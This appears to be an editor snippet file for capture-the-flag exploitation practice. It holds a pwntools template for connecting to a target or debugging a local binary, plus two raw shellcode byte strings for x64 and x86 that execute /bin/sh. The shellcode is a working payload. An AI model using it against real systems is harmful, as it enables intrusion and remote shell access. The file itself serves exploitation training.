snippet pwn "pwnable"
from pwn import *
import time
import sys


def exploit($2):
	${6:pass}


if __name__ == '__main__':
	context.arch = 'amd64'
	connect = '${1:nc localhost port}'
	connect = connect.split(' ')
	if len(sys.argv) > 1:
		${2:proc} = remote(connect[1], int(connect[2]))
	else:
		$2 = process('${3:filename}')
		gdb.attach($2, '''
		set follow-fork-mode child
		b *${4:main}+0x${5:00}
		continue
		''')
	exploit($2)
	$2.interactive()
endsnippet


snippet shellcode_x64 "x64 shellcode"
shellcode = '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
endsnippet

snippet shellcode_x86 "x86 shellcode"
shellcode = '\x31\xc0\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80'
endsnippet
